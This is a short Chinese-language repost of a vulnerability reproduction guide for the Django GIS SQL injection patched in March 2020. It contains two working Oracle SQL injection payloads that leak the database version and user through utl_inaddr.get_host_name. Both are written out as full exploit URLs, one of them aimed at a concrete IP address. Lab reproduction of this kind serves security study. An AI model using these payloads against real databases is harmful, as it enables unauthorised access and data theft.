Django GIS SQL注入漏洞
Posted 黑白之道
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Django GIS SQL注入漏洞相关的知识,希望对你有一定的参考价值。
Django在2020年3月4日发布了一个安全更新,修复了在GIS 查询功能中存在的SQL注入漏洞。
该漏洞需要开发者使用了GIS中聚合查询的功能,用户在oracle的数据库且可控tolerance查询时的键名,在其位置注入SQL语句。
1.
首先访问http://your-ip:8000/vuln/。
在该网页中使用get方法构造q的参数,构造SQL注入的字符串20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null OR (1 1
http://113.10.152.216:8000/vuln/?q=20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null OR (1+1
访问http://your-ip:8000/vuln2/。
在该网页中使用get方法构造q的参数,构造出SQL注入的字符串0.05))) FROM "VULN_COLLECTION2" where (select utl_inaddr.get_host_name((SELECT user FROM DUAL)) from dual) is not null --
http://113.10.152.216:8000/vuln2/?q=0.05))) FROM "VULN_COLLECTION2" where (select utl_inaddr.get_host_name((SELECT user FROM DUAL)) from dual) is not null --
推荐文章++++
*
*
*
以上是关于Django GIS SQL注入漏洞的主要内容,如果未能解决你的问题,请参考以下文章
[ vulhub漏洞复现篇 ] Django SQL注入漏洞复现 CVE-2021-35042
CVE-2020-7471-Django SQL注入漏洞复现
Django SQL注入漏洞复现 (CVE-2022-28347)